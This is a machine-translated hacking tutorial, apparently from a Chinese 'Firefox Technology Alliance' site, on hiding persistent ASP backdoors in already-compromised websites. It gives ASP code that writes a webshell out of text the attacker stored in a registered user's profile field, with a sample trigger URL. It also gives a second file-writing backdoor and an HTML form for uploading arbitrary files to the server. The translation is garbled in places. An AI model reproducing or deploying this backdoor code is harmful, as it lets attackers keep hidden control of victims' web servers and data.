Teach you to use the. mdb suffix database to do the back door

Data | database

Foreword: A long time, from the beginning of the site manager to now popular several ASP back door, I believe most network management can say these classic Webshell name, such as the sea, veterans, blue screen, etc., also believe that most of the network management learned the keyword search methods to search these Trojans, Of course now the time if again like hidden back door to speak some skills, as the saying goes, "Buddha is a ruler, I am a senior."

I do not deny that the n earlier the ASP Trojan to write to the picture file is a good way, in fact, not only can write to the picture of the mp3 file written to Doc is OK.

Copy filename/parameter + filename/parameter build file name

Such a method can be very flexible use to achieve the purpose of hiding files, the specific parameters are/A to Acsic code,/b binary way, it does not wordy these, as to how to upload Webshell, what is Webshell also does not belong to the scope of the discussion of this article. Today is about how to put the back door in the suffix. mdb, provided that after we get a webshell ...

We know that many sites in the user registration to fill a lot of things such as: User name, password, QQ, mailbox, personal profile, telephone, contact information, address class. The corresponding tables, fields, and values will also be available in the corresponding to. What I'm going to do today is I'm registering a user to write the shell code on my profile, then modify a file on his site, trigger the file when used, and then back up the shell code in my resume to the current directory.

Cut the crap, everybody look at the code:

<%
Ifrequest ("action") = "Firefox" then
Fname=request.querystring ("FN")
Tname=request.querystring ("TN")
Bname=request.querystring ("bn")
Id=request.querystring ("id")
Idvalue=request.querystring ("IdV")
Setrs=server.createobject ("Adodb.recordset")
Sql= "Select" &bname& "from" &tname& "where" &id& "=" &idvalue& "" ""
rs.opensql,conn,1,3
Ifnotrs.eofthen
Content=rs (bname)
Else
Response.Write "Nothing"
endif
Setfso=server.createobject ("Scripting.FileSystemObject")
Settxtfile=fso.createtextfile (Server.MapPath (fname))
Txtfile.writeline (content)
Txtfile.close
endif
%>

Add the top code to a file in the site, such as news.asp. According to the information we know, after its site registration, download look at the structure. The Firefox name I signed up for is in the user table with an ID value of 119 for my registered resume in the table field JL.

news.asp?action=firefox&fn=firefox.asp&tn=user&bn=jl&id=id&idv=119

Then we can write a webshell named firefox.asp in the same directory as news.asp in use. The above can be said to be one of thousands of hidden methods, the bottom of which is another convenient way to hide, this method and the MDB suffix has no relationship.

Again, we modify the news.asp and insert the following code into the other news.asp:

<%
Ifrequest ("action") = "Firefox" then
N=request.form ("n")
C=request.form ("C")
Setfso=server.createobject ("Scripting.FileSystemObject")
Settxtfile=fso.createtextfile (Server.MapPath (n))
Txtfile.writeline (c)
Txtfile.close
endif
%>

This piece of code is relatively simple, is a Trojan server. Use this code in conjunction with:

<HTML><HEAD>
<metahttp-equiv=content-typecontent= "text/html;charset=gb2312" >
<TITLE>F.S.T Firefox Technology Alliance [www.wrsky.com]</title>
<formaction= "...method=post>
<metacontent= "MSHTML6.00.2900.2180" name=generator><body>name:<inputsize=50
Name=nwidth= "><br><br>shell:<textareaname=crows=10cols=80"
Width= "></TEXTAREA><INPUTtype=submitvalue=Save></FORM></BODY></HTML>"

Replace the "Http://localhost/config.asp?action=firefox" in the above code with your service-side address and save it as a local. htm file. After the local open to define the file name to be generated, file content, remote submission, OK, but also a way to leave the back door.